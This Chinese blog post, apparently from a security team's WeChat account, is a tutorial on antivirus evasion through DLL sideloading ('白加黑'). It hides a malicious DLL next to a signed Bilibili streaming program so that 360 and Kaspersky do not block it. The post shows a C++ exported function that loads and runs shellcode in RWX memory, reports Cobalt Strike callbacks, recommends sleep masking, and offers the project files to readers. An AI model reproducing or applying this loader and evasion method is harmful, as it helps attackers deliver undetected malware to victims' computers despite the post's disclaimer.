文章总结: 这篇文章介绍了白加黑免杀技术,通过将恶意DLL替换为带数字签名的白程序所需的DLL,从而绕过360和卡巴斯基等杀毒软件的检测。文章详细说明了如何使用ZeroEye工具寻找合适的白文件,如何创建恶意DLL项目,以及如何将shellcode加载到最先调用的导出函数中。通过实际演示,展示了该技术成功绕过360和卡巴斯基的效果,并建议配合睡眠混淆技术进一步提高免杀效果。 综合评分: 89 文章分类: 免杀,漏洞分析,实战经验,安全工具,红队
[免杀]白加黑轻松绕过360/卡巴
sun4et
OnePanda-Sec
2025年12月15日 09:47 湖北
#
招新
OnePanda-Sec
-招新说明-
**招新要求
· 热爱网络安全,喜欢CTF
· 拥有CTF比赛经验,有较好比赛成绩的
· 乐于奉献、热爱分享,愿意提升 自己同时帮助他人
· 时间允许参加各类赛事,服从战队管理与安排
· 各类比赛获奖者、能力出众者视情况考量
· 未参与其他高校联队
· 大一同学视情况放宽资历要求**
联系方式
发送简历于邮箱
· 简历邮箱:[email protected]
聘
一、介绍
1、什么是白加黑
当一个 EXE 启动时,该程序会先把它需要的DLL加载起来。如果把DLL换成带后门的版本,那么执行该程序就会顺带把恶意 DLL 一起加载,后门代码也执行起来了。
这种把正常 DLL 替换掉的做法一般就叫 DLL 劫持。“白+黑”里的“白”指的是带签名的干净 EXE,“黑”说的就是混进去的那份恶意 DLL。
2、白加黑的作用
因为借助的是带有数字签名的白程序,所以杀毒软件对其部分恶意行为不会拦截,比如说常规进程注入360会拦截、卡巴执行shell命令会拦截等,使用白加黑上线后执行这些操作杀软则会放宽不拦截。
二、如何挖掘利用白文件
1、挖掘白文件
这里推荐ZeroEye自动收集DLL的项目
ZeroEye.exe -p D:\ -s #收集 D 盘中存在数字签名的 exe链接: https://github.com/ImCoriander/ZeroEye
这里是搜索出来的程序,选择的DLL最好满足下面两点:
①DLL比较少的并且不要有弹窗。
②不要使用带有微软签名的程序!!!因为微软签名的程序都被标记了,杀软比对一下hash就知道是否为DLL劫持。
找了一会看上了哔哩哔哩直播姬
三、制作免杀项目
创建vs的 dll项目
搜索出来的dll项目中/infos目录中有导出表的代码,直接复制粘贴过来即可:
为了找出程序执行的时候先调用哪个导出函数,执行一下直播坤
之后只需要将加载shellcode的代码放到最先调用执行的导出函数中即可(cef_api_hash)
简单的加载器代码,测试下上线:
extern "C" __declspec(dllexport) int cef_api_hash(){ LPVOID exec_mem = VirtualAlloc(NULL, sizeof(buf), MEM_RESERVE | MEM_COMMIT,PAGE_EXECUTE_READWRITE); memcpy(exec_mem, buf, sizeof(buf)); HANDLE handle = CreateThread( NULL, NULL, (LPTHREAD_START_ROUTINE)exec_mem, NULL, NULL, 0); WaitForSingleObject(handle, -1); return 0;}
成功上线,至此我们的白加黑免杀大功告成,后续只需要处理好dll的静态免杀即可。
四、最终效果,配合sleepmask(睡眠混淆)的免杀效果:
绕过360:
已关注
关注
重播 分享 赞
关闭
观看更多
更多
退出全屏
切换到竖屏全屏退出全屏
OnePanda-Sec已关注
分享视频
,时长01:14
0/0
00:00/01:14
切换到横屏模式
继续播放
[ ]
进度条,百分之0
播放
00:00
/
01:14
01:14
倍速
全屏
倍速播放中
0.5倍 0.75倍 1.0倍 1.5倍 2.0倍
超清 流畅
继续观看
[免杀]白加黑轻松绕过360/卡巴
观看更多
转载
,
[免杀]白加黑轻松绕过360/卡巴
OnePanda-Sec已关注
分享点赞在看
已同步到看一看写下你的评论
视频详情
可以看到进程注入未拦截
绕过卡巴:
已关注
关注
重播 分享 赞
关闭
观看更多
更多
退出全屏
切换到竖屏全屏退出全屏
OnePanda-Sec已关注
分享视频
,时长00:49
0/0
00:00/00:49
切换到横屏模式
继续播放
[ ]
进度条,百分之0
播放
00:00
/
00:49
00:49
倍速
全屏
倍速播放中
0.5倍 0.75倍 1.0倍 1.5倍 2.0倍
超清 流畅
继续观看
[免杀]白加黑轻松绕过360/卡巴
观看更多
转载
,
[免杀]白加黑轻松绕过360/卡巴
OnePanda-Sec已关注
分享点赞在看
已同步到看一看写下你的评论
视频详情
CS执行shell命令的时候会调用CreateProccess API创建cmd进程执行命令,这种行为在大部分杀软中都会拦截。可以使用内存中执行PE文件的方式绕过,简单点就用白加黑免杀(草履虫)。
本内容仅为技术研究与学习交流使用,所涉及的网络安全技术、工具、脚本及方法,严禁用于任何未经授权的非法入侵、攻击或破坏他人网络与系统的行为。一切后果由使用者自行承担!!
关注公众号后台回复“免杀”获取项目文件
OnePandaSec团队交流群,欢迎网络安全爱好者加入
查看原文:《[免杀]白加黑轻松绕过360/卡巴》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论